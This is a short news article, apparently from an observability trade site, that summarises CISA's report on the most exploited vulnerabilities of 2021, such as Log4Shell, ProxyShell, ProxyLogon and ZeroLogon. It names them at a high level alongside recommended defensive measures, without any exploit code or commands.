Many top vulnerabilities are in software libraries that have been used for years. Observability offers a better way (vs. traditional security approaches) to find and protect against them.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released its 2021 report outlining the most exploited vulnerabilities for that year. The findings highlight the need for more proactive, more sophisticated security approaches based on artificial intelligence and more.
Number one on the list is a vulnerability within the very popular Apache Log4j product. Known as Log4shell, this vulnerability is exploited most commonly using a specially crafted code string that led to threat actors taking over entire systems.
The vulnerability in Apache’s Log4j software library should be a main reason to adopt observability. According to CISA, “Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information.”
See also: Log4j Vulnerability Highlights the Need for Observability
Other notable vulnerabilities include ProxyShell and ProxyLogon, which are present on the Microsoft Exchange server. Both allow threat actors to escalate privileges and eventually take over mailboxes, files, and other credentialed products.
Some vulnerabilities from 2020, such as ZeroLogon, demonstrate the continued vulnerabilities for companies who use products no longer supported by vendors or get behind on updates to their systems.
Companies must act proactively to stay ahead of vulnerabilities. Releasing proof of code within two weeks provides a baseline reaction time for companies affected by these attacks. However, CISA recommends comprehensive security protocols such as updating end-of-life software and identity and access management policies. In addition, segmenting networks to limit the attack surface is also recommended.
Internet-facing systems are a particular concern
This year’s report found that cyber threat actors routinely targeted internet-facing systems such as email servers or virtual private network (VPN) servers. The rise of remote and distributed workforces should make this a concern for companies and enterprises in the throes of changing how and where their workforce performs company tasks.
For most of the vulnerabilities, threat actors released proof of concept codes within mere weeks. The quick release of these codes provided a broader range of threat actors with the tools they’d need to hit companies again.
Nine of the 15 vulnerabilities are remote code execution vulnerabilities. These loopholes allow threat actors to take over systems remotely and then gain access to wide swaths of the network once inside.